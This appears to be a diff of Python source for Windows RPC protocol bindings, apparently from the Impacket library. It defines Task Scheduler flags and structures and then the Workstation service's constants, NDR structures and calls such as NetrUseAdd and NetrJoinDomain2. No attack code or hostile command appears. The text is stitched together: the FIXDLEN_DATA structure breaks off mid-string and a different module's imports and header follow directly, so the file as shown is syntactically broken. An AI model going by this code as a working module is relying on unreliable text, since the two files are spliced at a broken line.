+TASK_DON_ADD_PRINCIPAL_ACE = 1<<(31-27)
+TASK_IGNORE_REGISTRATION_TRIGGERS = 1<<(31-26)
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+TASK_DONT_ADD_PRINCIPAL_ACE = 1<<(31-27)
+SCH_FLAG_FOLDER = 1<<(31-2)
+SCH_FLAG_TASK = 1<<(31-1)
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+TASK_ENUM_HIDDEN = 1
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+TASK_RUN_AS_SELF = 1<<(31-31)
+TASK_RUN_IGNORE_CONSTRAINTS = 1<<(31-30)
+TASK_RUN_USE_SESSION_ID = 1<<(31-29)
+TASK_RUN_USER_SID = 1<<(31-28)
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+SCH_FLAG_STATE = 1<<(31-3)
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.12 TASK_NAMES
+class TASK_NAMES_ARRAY(NDRUniConformantArray):
+ item = TASK_NAMES
+
+class PTASK_NAMES_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',TASK_NAMES_ARRAY),
+ )
+
+class WSTR_ARRAY(NDRUniConformantArray):
+ item = WSTR
+
+class PWSTR_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',WSTR_ARRAY),
+ )
+
+class GUID_ARRAY(NDRUniConformantArray):
+ item = GUID
+
+class PGUID_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',GUID_ARRAY),
+ )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SYSTEMTIME_ARRAY(NDRUniConformantArray):
+ item = SYSTEMTIME
+
+class PSYSTEMTIME_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',SYSTEMTIME_ARRAY),
+ )
+
+# 2.3.8 TASK_USER_CRED
+class TASK_USER_CRED(NDRSTRUCT):
+ structure = (
+ ('userId',LPWSTR),
+ ('password',LPWSTR),
+ ('flags',DWORD),
+ )
+
+class TASK_USER_CRED_ARRAY(NDRUniConformantArray):
+ item = TASK_USER_CRED
+
+class LPTASK_USER_CRED_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',TASK_USER_CRED_ARRAY),
+ )
+
+# 2.3.10 TASK_XML_ERROR_INFO
+class TASK_XML_ERROR_INFO(NDRSTRUCT):
+ structure = (
+ ('line',DWORD),
+ ('column',DWORD),
+ ('node',LPWSTR),
+ ('value',LPWSTR),
+ )
+
+class PTASK_XML_ERROR_INFO(NDRPOINTER):
+ referent = (
+ ('Data',TASK_XML_ERROR_INFO),
+ )
+
+# 2.4.1 FIXDLEN_DATA
+class FIXDLEN_DATA(Structure):
+ structure = (
+ ('Product Version','.
+# There are test cases for them too.
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRUNION, NDRUniConformantArray, NDRUniFixedArray, \
+ NDRPOINTER
+from impacket.dcerpc.v5.dtypes import NULL, WSTR, ULONG, LPWSTR, LONG, LARGE_INTEGER, WIDESTR, RPC_UNICODE_STRING, \
+ LPULONG, LPLONG
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_WKST = uuidtup_to_bin(('6BFFD098-A112-3610-9833-46C3F87E345A', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'WKST SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'WKST SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# 2.2.1.1 JOIN_MAX_PASSWORD_LENGTH
+JOIN_MAX_PASSWORD_LENGTH = 256
+
+# 2.2.1.2 JOIN_OBFUSCATOR_LENGTH
+JOIN_OBFUSCATOR_LENGTH = 8
+
+# 2.2.1.3 MAX_PREFERRED_LENGTH
+MAX_PREFERRED_LENGTH = 0xffffffff
+
+# 2.2.5.22 USE_INFO_1
+USE_OK = 0x00000000
+USE_PAUSED = 0x00000001
+USE_SESSLOST = 0x00000002
+USE_NETERR = 0x00000003
+USE_CONN = 0x00000004
+USE_RECONN = 0x00000005
+
+USE_WILDCARD = 0xFFFFFFFF
+USE_DISKDEV = 0x00000000
+USE_SPOOLDEV = 0x00000001
+USE_CHARDEV = 0x00000002
+USE_IPC = 0x00000003
+
+# 3.2.4.9 NetrUseDel (Opnum 10)
+# Force Level
+USE_NOFORCE = 0x00000000
+USE_FORCE = 0x00000001
+USE_LOTS_OF_FORCE = 0x00000002
+
+# 3.2.4.13 NetrJoinDomain2 (Opnum 22)
+# Options
+NETSETUP_JOIN_DOMAIN = 0x00000001
+NETSETUP_ACCT_CREATE = 0x00000002
+NETSETUP_ACCT_DELETE = 0x00000004
+NETSETUP_DOMAIN_JOIN_IF_JOINED = 0x00000020
+NETSETUP_JOIN_UNSECURE = 0x00000040
+NETSETUP_MACHINE_PWD_PASSED = 0x00000080
+NETSETUP_DEFER_SPN_SET = 0x00000100
+NETSETUP_JOIN_DC_ACCOUNT = 0x00000200
+NETSETUP_JOIN_WITH_NEW_NAME = 0x00000400
+NETSETUP_INSTALL_INVOCATION = 0x00040000
+
+# 3.2.4.14 NetrUnjoinDomain2 (Opnum 23)
+# Options
+NETSETUP_ACCT_DELETE = 0x00000004
+NETSETUP_IGNORE_UNSUPPORTED_FLAGS = 0x10000000
+
+# 3.2.4.15 NetrRenameMachineInDomain2 (Opnum 24)
+# Options
+NETSETUP_ACCT_CREATE = 0x00000002
+NETSETUP_DNS_NAME_CHANGES_ONLY = 0x00001000
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# 2.2.2.1 WKSSVC_IDENTIFY_HANDLE
+class WKSSVC_IDENTIFY_HANDLE(NDRSTRUCT):
+ structure = (
+ ('Data', WSTR),
+ )
+
+class LPWKSSVC_IDENTIFY_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', WKSSVC_IDENTIFY_HANDLE),
+ )
+
+# 2.2.2.2 WKSSVC_IMPERSONATE_HANDLE
+class WKSSVC_IMPERSONATE_HANDLE(NDRSTRUCT):
+ structure = (
+ ('Data',WSTR),
+ )
+
+class LPWKSSVC_IMPERSONATE_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', WKSSVC_IMPERSONATE_HANDLE),
+ )
+
+# 2.2.3.1 NETSETUP_JOIN_STATUS
+class NETSETUP_JOIN_STATUS(NDRENUM):
+ class enumItems(Enum):
+ NetSetupUnknownStatus = 0
+ NetSetupUnjoined = 1
+ NetSetupWorkgroupName = 2
+ NetSetupDomainName = 3
+
+# 2.2.3.2 NETSETUP_NAME_TYPE
+class NETSETUP_NAME_TYPE(NDRENUM):
+ class enumItems(Enum):
+ NetSetupUnknown = 0
+ NetSetupMachine = 1
+ NetSetupWorkgroup = 2
+ NetSetupDomain = 3
+ NetSetupNonExistentDomain = 4
+ NetSetupDnsMachine = 5
+
+# 2.2.3.3 NET_COMPUTER_NAME_TYPE
+class NET_COMPUTER_NAME_TYPE(NDRENUM):
+ class enumItems(Enum):
+ NetPrimaryComputerName = 0
+ NetAlternateComputerNames = 1
+ NetAllComputerNames = 2
+ NetComputerNameTypeMax = 3
+
+# 2.2.5.1 WKSTA_INFO_100
+class WKSTA_INFO_100(NDRSTRUCT):
+ structure = (
+ ('wki100_platform_id', ULONG),
+ ('wki100_computername', LPWSTR),
+ ('wki100_langroup', LPWSTR),
+ ('wki100_ver_major', ULONG),
+ ('wki100_ver_minor', ULONG),
+ )
+
+class LPWKSTA_INFO_100(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_100),
+ )
+
+# 2.2.5.2 WKSTA_INFO_101
+class WKSTA_INFO_101(NDRSTRUCT):
+ structure = (
+ ('wki101_platform_id', ULONG),
+ ('wki101_computername', LPWSTR),
+ ('wki101_langroup', LPWSTR),
+ ('wki101_ver_major', ULONG),
+ ('wki101_ver_minor', ULONG),
+ ('wki101_lanroot', LPWSTR),
+ )
+
+class LPWKSTA_INFO_101(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_101),
+ )
+
+# 2.2.5.3 WKSTA_INFO_102
+class WKSTA_INFO_102(NDRSTRUCT):
+ structure = (
+ ('wki102_platform_id', ULONG),
+ ('wki102_computername', LPWSTR),
+ ('wki102_langroup', LPWSTR),
+ ('wki102_ver_major', ULONG),
+ ('wki102_ver_minor', ULONG),
+ ('wki102_lanroot', LPWSTR),
+ ('wki102_logged_on_users', ULONG),
+ )
+
+class LPWKSTA_INFO_102(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_102),
+ )
+
+# 2.2.5.4 WKSTA_INFO_502
+class WKSTA_INFO_502(NDRSTRUCT):
+ structure = (
+ ('wki502_char_wait', ULONG),
+ ('wki502_collection_time', ULONG),
+ ('wki502_maximum_collection_count', ULONG),
+ ('wki502_keep_conn', ULONG),
+ ('wki502_max_cmds', ULONG),
+ ('wki502_sess_timeout', ULONG),
+ ('wki502_siz_char_buf', ULONG),
+ ('wki502_max_threads', ULONG),
+ ('wki502_lock_quota', ULONG),
+ ('wki502_lock_increment', ULONG),
+ ('wki502_lock_maximum', ULONG),
+ ('wki502_pipe_increment', ULONG),
+ ('wki502_pipe_maximum', ULONG),
+ ('wki502_cache_file_timeout', ULONG),
+ ('wki502_dormant_file_limit', ULONG),
+ ('wki502_read_ahead_throughput', ULONG),
+ ('wki502_num_mailslot_buffers', ULONG),
+ ('wki502_num_srv_announce_buffers', ULONG),
+ ('wki502_max_illegal_datagram_events', ULONG),
+ ('wki502_illegal_datagram_event_reset_frequency', ULONG),
+ ('wki502_log_election_packets', LONG),
+ ('wki502_use_opportunistic_locking', LONG),
+ ('wki502_use_unlock_behind', LONG),
+ ('wki502_use_close_behind', LONG),
+ ('wki502_buf_named_pipes', LONG),
+ ('wki502_use_lock_read_unlock', LONG),
+ ('wki502_utilize_nt_caching', LONG),
+ ('wki502_use_raw_read', LONG),
+ ('wki502_use_raw_write', LONG),
+ ('wki502_use_write_raw_data', LONG),
+ ('wki502_use_encryption', LONG),
+ ('wki502_buf_files_deny_write', LONG),
+ ('wki502_buf_read_only_files', LONG),
+ ('wki502_force_core_create_mode', LONG),
+ ('wki502_use_512_byte_max_transfer', LONG),
+ )
+
+class LPWKSTA_INFO_502(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_502),
+ )
+
+# 2.2.5.5 WKSTA_INFO_1013
+class WKSTA_INFO_1013(NDRSTRUCT):
+ structure = (
+ ('wki1013_keep_conn', ULONG),
+ )
+
+class LPWKSTA_INFO_1013(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_1013),
+ )
+
+# 2.2.5.6 WKSTA_INFO_1018
+class WKSTA_INFO_1018(NDRSTRUCT):
+ structure = (
+ ('wki1018_sess_timeout', ULONG),
+ )
+
+class LPWKSTA_INFO_1018(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_1018),
+ )
+
+# 2.2.5.7 WKSTA_INFO_1046
+class WKSTA_INFO_1046(NDRSTRUCT):
+ structure = (
+ ('wki1046_dormant_file_limit', ULONG),
+ )
+
+class LPWKSTA_INFO_1046(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO_1046),
+ )
+
+# 2.2.4.1 WKSTA_INFO
+class WKSTA_INFO(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+ union = {
+ 100: ('WkstaInfo100', LPWKSTA_INFO_100),
+ 101: ('WkstaInfo101', LPWKSTA_INFO_101),
+ 102: ('WkstaInfo102', LPWKSTA_INFO_102),
+ 502: ('WkstaInfo502', LPWKSTA_INFO_502),
+ 1013: ('WkstaInfo1013', LPWKSTA_INFO_1013),
+ 1018: ('WkstaInfo1018', LPWKSTA_INFO_1018),
+ 1046: ('WkstaInfo1046', LPWKSTA_INFO_1046),
+ }
+
+class LPWKSTA_INFO(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_INFO),
+ )
+
+# 2.2.5.8 WKSTA_TRANSPORT_INFO_0
+class WKSTA_TRANSPORT_INFO_0(NDRSTRUCT):
+ structure = (
+ ('wkti0_quality_of_service', ULONG),
+ ('wkti0_number_of_vcs', ULONG),
+ ('wkti0_transport_name', LPWSTR),
+ ('wkti0_transport_address', LPWSTR),
+ ('wkti0_wan_ish', ULONG),
+ )
+
+# 2.2.5.9 WKSTA_USER_INFO_0
+class WKSTA_USER_INFO_0(NDRSTRUCT):
+ structure = (
+ ('wkui0_username', LPWSTR),
+ )
+
+# 2.2.5.10 WKSTA_USER_INFO_1
+class WKSTA_USER_INFO_1(NDRSTRUCT):
+ structure = (
+ ('wkui1_username', LPWSTR),
+ ('wkui1_logon_domain', LPWSTR),
+ ('wkui1_oth_domains', LPWSTR),
+ ('wkui1_logon_server', LPWSTR),
+ )
+
+# 2.2.5.11 STAT_WORKSTATION_0
+class STAT_WORKSTATION_0(NDRSTRUCT):
+ structure = (
+ ('StatisticsStartTime', LARGE_INTEGER),
+ ('BytesReceived', LARGE_INTEGER),
+ ('SmbsReceived', LARGE_INTEGER),
+ ('PagingReadBytesRequested', LARGE_INTEGER),
+ ('NonPagingReadBytesRequested', LARGE_INTEGER),
+ ('CacheReadBytesRequested', LARGE_INTEGER),
+ ('NetworkReadBytesRequested', LARGE_INTEGER),
+ ('BytesTransmitted', LARGE_INTEGER),
+ ('SmbsTransmitted', LARGE_INTEGER),
+ ('PagingWriteBytesRequested', LARGE_INTEGER),
+ ('NonPagingWriteBytesRequested', LARGE_INTEGER),
+ ('CacheWriteBytesRequested', LARGE_INTEGER),
+ ('NetworkWriteBytesRequested', LARGE_INTEGER),
+ ('InitiallyFailedOperations', ULONG),
+ ('FailedCompletionOperations', ULONG),
+ ('ReadOperations', ULONG),
+ ('RandomReadOperations', ULONG),
+ ('ReadSmbs', ULONG),
+ ('LargeReadSmbs', ULONG),
+ ('SmallReadSmbs', ULONG),
+ ('WriteOperations', ULONG),
+ ('RandomWriteOperations', ULONG),
+ ('WriteSmbs', ULONG),
+ ('LargeWriteSmbs', ULONG),
+ ('SmallWriteSmbs', ULONG),
+ ('RawReadsDenied', ULONG),
+ ('RawWritesDenied', ULONG),
+ ('NetworkErrors', ULONG),
+ ('Sessions', ULONG),
+ ('FailedSessions', ULONG),
+ ('Reconnects', ULONG),
+ ('CoreConnects', ULONG),
+ ('Lanman20Connects', ULONG),
+ ('Lanman21Connects', ULONG),
+ ('LanmanNtConnects', ULONG),
+ ('ServerDisconnects', ULONG),
+ ('HungSessions', ULONG),
+ ('UseCount', ULONG),
+ ('FailedUseCount', ULONG),
+ ('CurrentCommands', ULONG),
+ )
+
+class LPSTAT_WORKSTATION_0(NDRPOINTER):
+ referent = (
+ ('Data', STAT_WORKSTATION_0),
+ )
+
+# 2.2.5.12 WKSTA_USER_INFO_0_CONTAINER
+class WKSTA_USER_INFO_0_ARRAY(NDRUniConformantArray):
+ item = WKSTA_USER_INFO_0
+
+class LPWKSTA_USER_INFO_0_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_USER_INFO_0_ARRAY),
+ )
+
+class WKSTA_USER_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPWKSTA_USER_INFO_0_ARRAY),
+ )
+
+class LPWKSTA_USER_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_USER_INFO_0_CONTAINER),
+ )
+
+# 2.2.5.13 WKSTA_USER_INFO_1_CONTAINER
+class WKSTA_USER_INFO_1_ARRAY(NDRUniConformantArray):
+ item = WKSTA_USER_INFO_1
+
+class LPWKSTA_USER_INFO_1_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_USER_INFO_1_ARRAY),
+ )
+
+class WKSTA_USER_INFO_1_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPWKSTA_USER_INFO_1_ARRAY),
+ )
+
+class LPWKSTA_USER_INFO_1_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_USER_INFO_1_CONTAINER),
+ )
+
+# 2.2.5.14 WKSTA_USER_ENUM_STRUCT
+class WKSTA_USER_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+
+ union = {
+ 0: ('Level0', LPWKSTA_USER_INFO_0_CONTAINER),
+ 1: ('Level1', LPWKSTA_USER_INFO_1_CONTAINER),
+ }
+
+class WKSTA_USER_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', ULONG),
+ ('WkstaUserInfo', WKSTA_USER_ENUM_UNION),
+ )
+
+
+# 2.2.5.15 WKSTA_TRANSPORT_INFO_0_CONTAINER
+class WKSTA_TRANSPORT_INFO_0_ARRAY(NDRUniConformantArray):
+ item = WKSTA_TRANSPORT_INFO_0
+
+class LPWKSTA_TRANSPORT_INFO_0_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_TRANSPORT_INFO_0_ARRAY),
+ )
+
+class WKSTA_TRANSPORT_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPWKSTA_TRANSPORT_INFO_0_ARRAY),
+ )
+
+class LPWKSTA_TRANSPORT_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', WKSTA_TRANSPORT_INFO_0_CONTAINER),
+ )
+
+# 2.2.5.16 WKSTA_TRANSPORT_ENUM_STRUCT
+class WKSTA_TRANSPORT_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+
+ union = {
+ 0: ('Level0', LPWKSTA_TRANSPORT_INFO_0_CONTAINER),
+ }
+
+class WKSTA_TRANSPORT_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', ULONG),
+ ('WkstaTransportInfo', WKSTA_TRANSPORT_ENUM_UNION),
+ )
+
+# 2.2.5.17 JOINPR_USER_PASSWORD
+class WCHAR_ARRAY(WIDESTR):
+ def getDataLen(self, data, offset=0):
+ return JOIN_MAX_PASSWORD_LENGTH
+
+class CHAR_ARRAY(NDRUniFixedArray):
+ def getDataLen(self, data, offset=0):
+ return JOIN_OBFUSCATOR_LENGTH
+
+class JOINPR_USER_PASSWORD(NDRSTRUCT):
+ structure = (
+ ('Obfuscator', CHAR_ARRAY),
+ ('Buffer', WCHAR_ARRAY),
+ )
+
+# 2.2.5.18 JOINPR_ENCRYPTED_USER_PASSWORD
+class JOINPR_ENCRYPTED_USER_PASSWORD(NDRSTRUCT):
+ structure = (
+ ('Buffer', '524s=b""'),
+ )
+ def getAlignment(self):
+ return 1
+
+class PJOINPR_ENCRYPTED_USER_PASSWORD(NDRPOINTER):
+ referent = (
+ ('Data', JOINPR_ENCRYPTED_USER_PASSWORD),
+ )
+
+# 2.2.5.19 UNICODE_STRING
+UNICODE_STRING = WSTR
+class PUNICODE_STRING(NDRPOINTER):
+ referent = (
+ ('Data', UNICODE_STRING),
+ )
+
+# 2.2.5.20 NET_COMPUTER_NAME_ARRAY
+class UNICODE_STRING_ARRAY(NDRUniConformantArray):
+ item = RPC_UNICODE_STRING
+
+class PUNICODE_STRING_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', UNICODE_STRING_ARRAY),
+ )
+
+class NET_COMPUTER_NAME_ARRAY(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('ComputerNames', PUNICODE_STRING_ARRAY),
+ )
+
+class PNET_COMPUTER_NAME_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', NET_COMPUTER_NAME_ARRAY),
+ )
+
+# 2.2.5.21 USE_INFO_0
+class USE_INFO_0(NDRSTRUCT):
+ structure = (
+ ('ui0_local', LPWSTR),
+ ('ui0_remote', LPWSTR),
+ )
+
+class LPUSE_INFO_0(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_0),
+ )
+
+# 2.2.5.22 USE_INFO_1
+class USE_INFO_1(NDRSTRUCT):
+ structure = (
+ ('ui1_local', LPWSTR),
+ ('ui1_remote', LPWSTR),
+ ('ui1_password', LPWSTR),
+ ('ui1_status', ULONG),
+ ('ui1_asg_type', ULONG),
+ ('ui1_refcount', ULONG),
+ ('ui1_usecount', ULONG),
+ )
+
+class LPUSE_INFO_1(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_1),
+ )
+
+# 2.2.5.23 USE_INFO_2
+class USE_INFO_2(NDRSTRUCT):
+ structure = (
+ ('ui2_useinfo', USE_INFO_1),
+ ('ui2_username', LPWSTR),
+ ('ui2_domainname', LPWSTR),
+ )
+
+class LPUSE_INFO_2(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_2),
+ )
+
+# 2.2.5.24 USE_INFO_3
+class USE_INFO_3(NDRSTRUCT):
+ structure = (
+ ('ui3_ui2', USE_INFO_2),
+ ('ui3_flags', ULONG),
+ )
+
+class LPUSE_INFO_3(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_3),
+ )
+
+# 2.2.4.2 USE_INFO
+class USE_INFO(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+
+ union = {
+ 0: ('UseInfo0', LPUSE_INFO_0),
+ 1: ('UseInfo1', LPUSE_INFO_1),
+ 2: ('UseInfo2', LPUSE_INFO_2),
+ 3: ('UseInfo3', LPUSE_INFO_3),
+ }
+
+# 2.2.5.25 USE_INFO_0_CONTAINER
+class USE_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPUSE_INFO_0),
+ )
+
+class LPUSE_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_0_CONTAINER),
+ )
+
+# 2.2.5.26 USE_INFO_1_CONTAINER
+class USE_INFO_1_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPUSE_INFO_1),
+ )
+
+class LPUSE_INFO_1_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_1_CONTAINER),
+ )
+
+# 2.2.5.27 USE_INFO_2_CONTAINER
+class USE_INFO_2_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', ULONG),
+ ('Buffer', LPUSE_INFO_2),
+ )
+
+class LPUSE_INFO_2_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', USE_INFO_2_CONTAINER),
+ )
+
+# 2.2.5.28 USE_ENUM_STRUCT
+class USE_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+
+ union = {
+ 0: ('Level0', LPUSE_INFO_0_CONTAINER),
+ 1: ('Level1', LPUSE_INFO_1_CONTAINER),
+ 2: ('Level2', LPUSE_INFO_2_CONTAINER),
+ }
+
+class USE_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', ULONG),
+ ('UseInfo', USE_ENUM_UNION),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.2.4.1 NetrWkstaGetInfo (Opnum 0)
+class NetrWkstaGetInfo(NDRCALL):
+ opnum = 0
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('Level', ULONG),
+ )
+
+class NetrWkstaGetInfoResponse(NDRCALL):
+ structure = (
+ ('WkstaInfo',WKSTA_INFO),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.2 NetrWkstaSetInfo (Opnum 1)
+class NetrWkstaSetInfo(NDRCALL):
+ opnum = 1
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('Level', ULONG),
+ ('WkstaInfo',WKSTA_INFO),
+ ('ErrorParameter',LPULONG),
+ )
+
+class NetrWkstaSetInfoResponse(NDRCALL):
+ structure = (
+ ('ErrorParameter',LPULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.3 NetrWkstaUserEnum (Opnum 2)
+class NetrWkstaUserEnum(NDRCALL):
+ opnum = 2
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('UserInfo', WKSTA_USER_ENUM_STRUCT),
+ ('PreferredMaximumLength', ULONG),
+ ('ResumeHandle', LPULONG),
+ )
+
+class NetrWkstaUserEnumResponse(NDRCALL):
+ structure = (
+ ('UserInfo',WKSTA_USER_ENUM_STRUCT),
+ ('TotalEntries',ULONG),
+ ('ResumeHandle',ULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.4 NetrWkstaTransportEnum (Opnum 5)
+class NetrWkstaTransportEnum(NDRCALL):
+ opnum = 5
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('TransportInfo', WKSTA_TRANSPORT_ENUM_STRUCT),
+ ('PreferredMaximumLength', ULONG),
+ ('ResumeHandle', LPULONG),
+ )
+
+class NetrWkstaTransportEnumResponse(NDRCALL):
+ structure = (
+ ('TransportInfo',WKSTA_TRANSPORT_ENUM_STRUCT),
+ ('TotalEntries',ULONG),
+ ('ResumeHandle',ULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.5 NetrWkstaTransportAdd (Opnum 6)
+class NetrWkstaTransportAdd(NDRCALL):
+ opnum = 6
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('Level', ULONG),
+ ('TransportInfo',WKSTA_TRANSPORT_INFO_0),
+ ('ErrorParameter',LPULONG),
+ )
+
+class NetrWkstaTransportAddResponse(NDRCALL):
+ structure = (
+ ('ErrorParameter',LPULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.7 NetrUseAdd (Opnum 8)
+class NetrUseAdd(NDRCALL):
+ opnum = 8
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('Level', ULONG),
+ ('InfoStruct',USE_INFO),
+ ('ErrorParameter',LPULONG),
+ )
+
+class NetrUseAddResponse(NDRCALL):
+ structure = (
+ ('ErrorParameter',LPULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.8 NetrUseGetInfo (Opnum 9)
+class NetrUseGetInfo(NDRCALL):
+ opnum = 9
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('UseName', WSTR),
+ ('Level',ULONG),
+ )
+
+class NetrUseGetInfoResponse(NDRCALL):
+ structure = (
+ ('InfoStruct',USE_INFO),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.9 NetrUseDel (Opnum 10)
+class NetrUseDel(NDRCALL):
+ opnum = 10
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('UseName', WSTR),
+ ('ForceLevel',ULONG),
+ )
+
+class NetrUseDelResponse(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.10 NetrUseEnum (Opnum 11)
+class NetrUseEnum(NDRCALL):
+ opnum = 11
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('InfoStruct', USE_ENUM_STRUCT),
+ ('PreferredMaximumLength',ULONG),
+ ('ResumeHandle',LPULONG),
+ )
+
+class NetrUseEnumResponse(NDRCALL):
+ structure = (
+ ('InfoStruct',USE_ENUM_STRUCT),
+ ('TotalEntries',ULONG),
+ ('ResumeHandle',LPULONG),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.11 NetrWorkstationStatisticsGet (Opnum 13)
+class NetrWorkstationStatisticsGet(NDRCALL):
+ opnum = 13
+ structure = (
+ ('ServerName', LPWKSSVC_IDENTIFY_HANDLE),
+ ('ServiceName', LPWSTR),
+ ('Level',ULONG),
+ ('Options',ULONG),
+ )
+
+class NetrWorkstationStatisticsGetResponse(NDRCALL):
+ structure = (
+ ('Buffer',LPSTAT_WORKSTATION_0),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.12 NetrGetJoinInformation (Opnum 20)
+class NetrGetJoinInformation(NDRCALL):
+ opnum = 20
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('NameBuffer', LPWSTR),
+ )
+
+class NetrGetJoinInformationResponse(NDRCALL):
+ structure = (
+ ('NameBuffer',LPWSTR),
+ ('BufferType',NETSETUP_JOIN_STATUS),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.13 NetrJoinDomain2 (Opnum 22)
+class NetrJoinDomain2(NDRCALL):
+ opnum = 22
+ structure = (
+ ('ServerName', LPWSTR),
+ ('DomainNameParam', WSTR),
+ ('MachineAccountOU', LPWSTR),
+ ('AccountName', LPWSTR),
+ ('Password', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Options', ULONG),
+ )
+
+class NetrJoinDomain2Response(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.14 NetrUnjoinDomain2 (Opnum 23)
+class NetrUnjoinDomain2(NDRCALL):
+ opnum = 23
+ structure = (
+ ('ServerName', LPWSTR),
+ ('AccountName', LPWSTR),
+ ('Password', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Options', ULONG),
+ )
+
+class NetrUnjoinDomain2Response(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
